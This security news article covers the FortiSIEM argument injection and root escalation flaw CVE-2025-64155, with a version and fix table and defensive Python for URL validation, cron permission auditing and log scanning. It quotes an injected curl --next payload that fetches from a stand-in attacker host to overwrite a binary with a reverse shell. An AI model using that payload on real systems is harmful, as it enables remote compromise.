Critical FortiSIEM Vulnerability (CVE-2025-64155) Enables Full RCE and Root Compromise

By Marcus Rodriguez, January 14, 2026

Fortinet issued an advisory in August 2025 for CVE-2025-25256, an OS command injection vulnerability (CWE-78) affecting FortiSIEM. This flaw exposed the platform to unauthenticated remote code execution through crafted CLI requests.

Practical exploits surfaced in the wild, prompting security firm Horizon3.ai to conduct a deep investigation. Their analysis uncovered a devastating chain: an unauthenticated argument injection vulnerability enabling arbitrary file writes and RCE as the admin user, paired with a file overwrite privilege escalation to root access.

Fortinet assigned these issues CVE-2025-64155 under advisory FG-IR-25-772. A proof-of-concept exploit is available on GitHub.

This marks another chapter in FortiSIEM’s vulnerability saga for Horizon3.ai researchers, who have dissected the platform for years. Prior disclosures include CVE-2023-34992 (phMonitor command injection) and CVE-2024-23108 (second-order injection), detailed in their deep dives.

Although not listed in CISA’s Known Exploited Vulnerabilities catalog, leaked Black Basta ransomware chats from earlier in 2025 referenced these flaws, indicating threat actor interest.

FortiSIEM Architecture and phMonitor Exposure

FortiSIEM supports several deployment models, from all-in-one servers to supervisor-collector topologies; in each, the phMonitor service handles communication between roles over TCP port 7900.

The service accepts its custom API messages without authentication and dispatches each command to a handler by an integer identifier registered in phMonitorProcess::initEventHandler. Earlier hardening reduced the exposed surface, but vulnerabilities persist.

CVE-2025-64155 lies in handleStorageRequest when the storage type is "elastic": user-controlled XML tags such as cluster_name and cluster_url are passed to /opt/phoenix/phscripts/bin/elastic_test_url.sh.

Although the values pass through subprocess.run() wrappers and wrapShellToken escaping, the script's curl invocation (made via execve) still allows argument injection: the escaping prevents shell command injection but does not stop a value from reaching curl as extra arguments.

By leveraging curl's obscure --next flag, attackers chain a second request inside the same invocation: <cluster_url>http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url>.

This overwrites phLicenseTool, a binary that is executed every few seconds, with a reverse shell, yielding access as the admin user.
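To make the difference between shell escaping and argument injection concrete, here is an added example in Python written for this article; it is not FortiSIEM's code and does not reproduce elastic_test_url.sh. argv_after_unquoted_expansion models one common way such a split happens (a shell script expanding a value unquoted, so each whitespace-separated piece becomes its own argument to curl); that it is the exact mechanism in the script is an assumption. validate_cluster_url and build_curl_argv show the defensive counterpart: accept only a single http(s) URL and pass it to exec as one argv element. The hostnames es.internal and attacker are constructed sample values; --silent and --max-time are ordinary curl options included only to give the argv a realistic shape.

```python
from urllib.parse import urlsplit

# Constructed sample values (not real hosts or captured traffic).
BENIGN = "http://es.internal:9200"
# Shape of the injected cluster_url value quoted in the article.
INJECTED = ("http://attacker:9200 --next -o "
            "/opt/phoenix/bin/phLicenseTool http://attacker:9200")


def argv_after_unquoted_expansion(value):
    """Model an unquoted shell expansion such as `curl $URL`: the shell
    word-splits the value on whitespace, so every piece becomes its own
    argv entry and curl sees option flags it was never meant to receive.
    (Assumed mechanism for illustration, not the script's exact code.)"""
    return ["curl"] + value.split()


def validate_cluster_url(value):
    """Accept exactly one http(s) URL with a host and return it.
    Anything curl could read as an option, or as a second URL,
    is rejected before it gets anywhere near an exec call."""
    if not value or value != value.strip():
        raise ValueError("empty or whitespace-padded value")
    if any(ch.isspace() for ch in value):
        raise ValueError("embedded whitespace would split into extra arguments")
    if value.startswith("-"):
        raise ValueError("leading dash would be parsed as a curl option")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("not an http(s) URL with a host component")
    return value


def is_safe_cluster_url(value):
    """Boolean wrapper around validate_cluster_url for callers and tests."""
    try:
        validate_cluster_url(value)
        return True
    except ValueError:
        return False


def build_curl_argv(value):
    """Build the exec argv as a list: one list element is one argument,
    so the value cannot be split or reinterpreted whatever it contains.
    --silent and --max-time are ordinary curl options, present only to
    make the argv shape realistic."""
    return ["curl", "--silent", "--max-time", "5", validate_cluster_url(value)]


if __name__ == "__main__":
    print("unquoted expansion ->", argv_after_unquoted_expansion(INJECTED))
    print("hardened benign    ->", build_curl_argv(BENIGN))
    print("hardened injected  ->", is_safe_cluster_url(INJECTED))
```

The point of the two functions side by side is that escaping for the shell and validating for the next program are separate problems: wrapShellToken-style quoting keeps the shell honest, but only a strict allow-list on the value itself, plus an argv list rather than a command string, keeps curl from receiving options it should never see.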

Affected versions and fixes:

Version        Affected         Solution
7.4            Not affected     N/A
7.3            7.3.0 - 7.3.1    Upgrade to 7.3.2+
7.2            7.2.0 - 7.2.5    Upgrade to 7.2.6+
7.1            7.1.0 - 7.1.7    Upgrade to 7.1.8+
7.0            7.0.0 - 7.0.3    Upgrade to 7.0.4+
6.7            6.7.0 - 6.7.9    Upgrade to 6.7.10+
6.6 and below  All versions     Migrate to a fixed release

Admin shells pave the way to root via cron job abuse. The root crontab /etc/cron.d/fsm-crontab runs /opt/charting/redishb.sh every minute, and the script is writable by the admin user even though it executes as root. Overwriting it with a payload grants full compromise.
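The weakness behind that escalation (a root-run cron target that a lower-privileged user can modify) is easy to check for generically. The following Python audit is an added example written for this article, not a Fortinet or Horizon3.ai tool: it parses /etc/cron.d-style entries, keeps the ones that run as root, and reports any target script that is owned by the wrong user, group- or world-writable, or sitting in a directory where someone else could replace it. demo_audit builds a constructed scenario in a private temporary directory, with one script given the loose permissions the article describes for redishb.sh, and uses the current user as the trusted owner so it runs without root; the file names and crontab lines in it are constructed.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) from /etc/cron.d-style lines: five schedule
    fields (or one @shortcut), then the user, then the command. Comments,
    blank lines and VAR=value assignments are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        if "=" in line.split(None, 1)[0]:
            continue  # environment assignment such as SHELL=/bin/sh
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]


def command_path(command):
    """First word of the command if it is an absolute path, else None."""
    first = command.split(None, 1)[0]
    return first if first.startswith("/") else None


def writable_by_others(st):
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_root_cron_targets(crontab_text, trusted_uid=0):
    """Return (path, reason) for each script a root cron entry executes
    that a less privileged user could modify or replace."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = command_path(command)
        if path is None:
            continue
        if not os.path.exists(path):
            findings.append((path, "target missing; a user able to create it would run as root"))
            continue
        st = os.stat(path)
        parent = os.stat(os.path.dirname(path))
        sticky_parent = bool(parent.st_mode & stat.S_ISVTX)
        if st.st_uid != trusted_uid:
            findings.append((path, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        elif writable_by_others(st):
            findings.append((path, "group- or world-writable"))
        elif not sticky_parent and (parent.st_uid != trusted_uid or writable_by_others(parent)):
            findings.append((path, "parent directory lets others replace the file"))
    return findings


def demo_audit():
    """Constructed scenario: one script with the loose permissions the
    article describes for /opt/charting/redishb.sh and one with a normal
    0755 mode. trusted_uid is the current user so no root is needed."""
    with tempfile.TemporaryDirectory() as root:
        weak = os.path.join(root, "redishb.sh")
        good = os.path.join(root, "rotate-logs.sh")
        for p in (weak, good):
            with open(p, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
        os.chmod(weak, 0o777)  # anyone may rewrite what root will execute
        os.chmod(good, 0o755)
        crontab = (
            "# constructed content in /etc/cron.d/fsm-crontab format\n"
            "SHELL=/bin/sh\n"
            f"* * * * * root {weak} >/dev/null 2>&1\n"
            f"*/5 * * * * root {good}\n"
            f"@reboot root {good} --init\n"
            f"* * * * * admin {weak}\n"  # not root: out of scope here
        )
        return audit_root_cron_targets(crontab, trusted_uid=os.getuid())


if __name__ == "__main__":
    for path, reason in demo_audit():
        print(f"{path}: {reason}")
```

Run against a real host, audit_root_cron_targets(open("/etc/cron.d/fsm-crontab").read()) would flag redishb.sh for the reason the article gives; the same function is worth pointing at every file under /etc/cron.d and at the root crontab itself, since a writable target anywhere in that set is equivalent to a root shell for whoever can write it.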

Indicators of Compromise

Monitor /opt/phoenix/log/phoenix.logs for PHL_ERROR entries that record elastic_test_url.sh abuse, including the injected URLs and target files (e.g., phLicenseTool overwrites).

Fortinet urges upgrading and restricting access to port 7900. Organizations should audit their logs and patch immediately amid rising targeting of SIEM platforms.
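The log guidance above can be turned into a small triage script. The Python below is an added example for this article, not a Fortinet detection rule: it scopes to PHL_ERROR lines that mention elastic_test_url.sh, then flags a line only when the URL field carries stand-alone curl option tokens, more than one URL, or a reference to phLicenseTool. The article names those markers but not the line layout of phoenix.logs, so the timestamps and field names in SAMPLE_LOG_LINES are constructed; the fourth sample line exists to show that a legitimate URL whose path merely contains "--next" is not reported.

```python
import re

# Constructed sample entries. Only the markers the article names
# (PHL_ERROR, elastic_test_url.sh, phLicenseTool) come from it; the
# timestamps and "cluster_url=" field layout are invented for the demo.
SAMPLE_LOG_LINES = [
    "2026-01-14 10:21:05 PHL_INFO phMonitor: handleStorageRequest type=elastic",
    "2026-01-14 10:21:06 PHL_ERROR phMonitor: elastic_test_url.sh failed for "
    "cluster_url=http://es.internal:9200 (connection refused)",
    "2026-01-14 10:22:31 PHL_ERROR phMonitor: elastic_test_url.sh failed for "
    "cluster_url=http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool "
    "http://attacker:9200",
    "2026-01-14 10:22:40 PHL_ERROR phMonitor: elastic_test_url.sh failed for "
    "cluster_url=http://es.internal:9200/--next (404)",
]

# curl options that redirect output to a file or start a second transfer,
# matched only as stand-alone whitespace-delimited tokens so that a URL
# path such as /--next is not mistaken for an option.
OPTION_RE = re.compile(
    r"(?<!\S)(--next|-o|--output|-O|--remote-name|-T|--upload-file|-K|--config)(?!\S)"
)
URL_RE = re.compile(r"https?://")


def suspicious_reasons(line):
    """Return the reasons one log line looks like elastic_test_url.sh abuse
    (an empty list for an ordinary connectivity failure)."""
    if "PHL_ERROR" not in line or "elastic_test_url.sh" not in line:
        return []
    reasons = []
    opts = OPTION_RE.findall(line)
    if opts:
        reasons.append("curl options in URL field: " + ", ".join(opts))
    n_urls = len(URL_RE.findall(line))
    if n_urls > 1:
        reasons.append(f"{n_urls} URLs in one request")
    if "phLicenseTool" in line:
        reasons.append("references phLicenseTool")
    return reasons


def scan_lines(lines):
    """Return [(line_number, reasons)] for every line worth an alert."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = suspicious_reasons(line)
        if reasons:
            findings.append((n, reasons))
    return findings


def scan_file(path):
    """Same scan over a real file, e.g. /opt/phoenix/log/phoenix.logs."""
    with open(path, errors="replace") as f:
        return scan_lines(line.rstrip("\n") for line in f)


if __name__ == "__main__":
    for n, reasons in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: " + "; ".join(reasons))
```

Because the real field layout is not documented here, the matching is deliberately position-independent: it looks for option tokens and URL counts anywhere in the line rather than after a particular key, so it keeps working if the error text is formatted differently from the constructed samples. Any hit should be cross-checked against the modification time and hash of /opt/phoenix/bin/phLicenseTool and /opt/charting/redishb.sh.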

All Rights Reserved by HackersRadar ©2026